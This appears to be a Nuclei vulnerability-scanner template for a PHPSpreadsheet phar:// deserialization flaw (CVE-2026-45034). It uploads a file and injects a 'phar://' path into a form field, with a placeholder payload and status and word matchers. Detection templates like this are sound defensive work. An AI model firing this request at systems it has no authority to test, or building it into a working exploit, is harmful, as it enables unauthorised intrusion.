id: CVE-2026-45034

info:
  name: PHPSpreadsheet Phar Deserialization RCE
  author: Cyber DarkNay
  severity: critical
  description: |
    PHPSpreadsheet library allows phar:// deserialization via file upload, leading to unauthenticated RCE.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-45034
  tags: cve,cve2026,rce,phar,deserialization

variables:
  filename: "{{randstr}}.xlsx"
  payload: "test"

requests:
  - raw:
      - |
        POST /vendor/phpoffice/phpspreadsheet/samples/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

        ------WebKitFormBoundary
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

        {{payload}}
        ------WebKitFormBoundary
        Content-Disposition: form-data; name="filename"

        phar://{{filename}}/test.txt
        ------WebKitFormBoundary--

    # Require both matchers to hit. The nuclei default is "or", which would
    # report a critical finding on any 200 response.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        # Both words must be present in the body (the default is "or").
        condition: and
        words:
          - "Spreadsheet"
          - "loaded"